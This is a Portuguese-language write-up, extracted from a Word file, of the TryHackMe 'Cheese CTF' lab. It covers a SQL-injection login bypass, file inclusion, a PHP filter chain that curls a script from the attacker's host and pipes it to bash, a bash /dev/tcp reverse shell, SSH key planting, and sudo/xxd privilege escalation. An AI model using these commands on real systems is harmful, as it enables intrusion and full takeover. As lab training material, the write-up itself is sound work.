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15" name="image1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Título do CTF – Plataforma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Cheese CTF -  Artur Adam de Oliveira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29/10/2025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https://tryhackme.com/room/cheesectfv10</w:t>
              </w:r>
            </w:hyperlink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26/10/2025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29/10/2025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29/10/2025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Escalonamento de privilégios, SQL Injection, reverse-shell, php file exploitation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 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100568231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lsmxlqoi499x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s3jfqtv4av6e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color w:val="151c2b"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:highlight w:val="white"/>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:t xml:space="preserve">What is the user.txt flag?</w:t>
          </w:r>
          <w:hyperlink w:anchor="_rbya4elmdyv0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color w:val="151c2b"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:highlight w:val="white"/>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:t xml:space="preserve">What is the root.txt flag?</w:t>
          </w:r>
          <w:hyperlink w:anchor="_61d3a8f5zijx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55pnaapg893c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ukny8rf8n645">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Referências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lsmxlqoi499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é um ctf que aborda diversos temas como SQL Injection, escalonamento de privilégios, exploit de arquivos php e mais, além de apresentar um tema de queijo.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s3jfqtv4av6e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rbya4elmdyv0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is the user.txt flag?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utilize o comando Nmap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nmap -T4 [IP_da_Máquina]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pode se notar que são devolvidas diversas portas abertas, inclusive as portas 80, 21 e 22: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537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Verificando o port 80 pode-se encontrar um site com uma área de login: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5527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4089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poder dar um bypass neste login, utilize uma sql-injection. Primeiramente abra o Burp Suite e intercepte o pedido de login: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397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Envie este pedido para o intruder e coloque o sinal § ao redor do login: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2479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seguir pegue uma wordlist para injeção sql como no site,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https://github.com/payloadbox/sql-injection-payload-list/blob/master/Intruder/exploit/Auth_Bypass.txt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 copie os argumentos para que sejam utilizados pelo intruder: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168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esperar um pouco será recebido um argumento da wordlist que possui um status code diferente, este pode ser utilizado para receber acesso a página que mostra isso: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429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Clicando em qualquer das abas do painel, é possível ver que o url muda a partir do file, permitindo com que seja possível alterar o endereço para algo que garanta acesso, para testar substitua o file=... por file=../../../etc/passwd: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778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Isso confirma que este sistema possui uma vulnerabilidade de inclusão de arquivo, para tomar vantagem disso, vá até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https://github.com/synacktiv/php_filter_chain_generator/blob/main/php_filter_chain_generator.py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baixe o arquivo, agora crie um arquivo nomeado revshell e coloque o código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bash -i &gt;&amp; /dev/tcp/[IP_da_Sua_Máquina]/4444 0&gt;&amp;1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após isso execute o seguinte comando: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python3 php_filter_chain_generator.py --chain '&lt;?= `curl -s -L [IP_da_Sua_Máquina]/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revshell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|bash` ?&gt;'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criar um chain do arquivo php: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485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execute em um terminal separado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nc -lvnp [Port_desejado]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no terminal original crie um servidor http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python3 -m http.server 80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agora tudo que precisa fazer é copiar o chain previamente criado e no firefox coloque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http://[IP_da_Máquina]/secret-script.php?file=[Chain_Criado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pronto, o reverse shell foi executado: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651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Navegue brevemente pelo shell e encontre o user.txt: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05275" cy="20383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Infelizmente não se possui permissão para obter este arquivo, então é necessário realizar um escalonamento de privilégios e desta forma pode-se encontrar que não apenas pode-se acessar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.ssh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também é possível editar as chaves autorizadas, algo que permite com que se possa adicionar a chave ssh que deseje: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46990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Gere sua própria chave ssh através do comando (em um terminal separado)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ssh-keygen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5179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Navegue até o local onde a chave está guardado e a copie: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498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retorne ao terminal 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www-data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rode o seguinte código no .ssh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echo “[Sua_chave_ssh]” &gt;&gt; authorized_keys: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444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tudo que é necessário é acessar o usuário comte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ssh comte@[IP_da_Máquina]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se recebe acesso ao ssh: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6172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assim a primeira flag é obtida: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67175" cy="55149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61d3a8f5zijx" w:id="3"/>
      <w:bookmarkEnd w:id="3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is the root.txt flag?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Rode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sudo -l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checar quais privilégios a conta possui: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00600" cy="10191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Sabe-se que se possui privilégios de escrita e leitura no exploit.timer pode ser utilizado para realizar o escalonamento vá até o local do exploit.timer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cd etc/systemd/system)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faça duas coisas, primeiro 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nano exploit.timer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mudar o OnBootSec para 0 e um segundo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nano exploit.service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verificar como pode se utilizar o exploit.service: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96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Verifique o GTFOBins para ver que tipo de vulnerabilidade pode ser aproveitada com o xxd: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20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vulnerabilidade pode ser utilizada através do seguinte modo, inicie o exploit.timer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sudo /bin/systemctl start exploit.timer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vá ao diretório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/opt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garanta que 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xxd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agora esta presente e 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LFILE=/root/root.txt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retorne ao diretório original e rode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/opt/xxd "$LFILE" | xxd -r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obter a flag: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57775" cy="3086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assim se conclui o ctf.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55pnaapg893c" w:id="4"/>
      <w:bookmarkEnd w:id="4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ctf aborda diversos temas diversos de modo que apesar apresentar a dificuldade como fácil possui um grau decente de dificuldade, mas ao mesmo tempo é um bom ctf para que se aprenda mais sobre os tópicos que ele aborda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ukny8rf8n645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https://exploit-notes.hdks.org/exploit/web/php-filters-chain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https://github.com/synacktiv/php_filter_chain_generator/blob/main/php_filter_chain_generator.py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https://github.com/payloadbox/sql-injection-payload-list/blob/master/Intruder/exploit/Auth_Bypass.txt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https://gtfobins.github.io/gtfobins/xxd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sectPr>
      <w:headerReference r:id="rId35" w:type="default"/>
      <w:footerReference r:id="rId36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1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image" Target="media/image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hyperlink" Target="https://tryhackme.com/room/cheesectfv10" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://exploit-notes.hdks.org/exploit/web/php-filters-chain" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/payloadbox/sql-injection-payload-list/blob/master/Intruder/exploit/Auth_Bypass.txt" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/synacktiv/php_filter_chain_generator/blob/main/php_filter_chain_generator.py" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/payloadbox/sql-injection-payload-list/blob/master/Intruder/exploit/Auth_Bypass.txt" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gtfobins.github.io/gtfobins/xxd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36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/synacktiv/php_filter_chain_generator/blob/main/php_filter_chain_generator.py" TargetMode="External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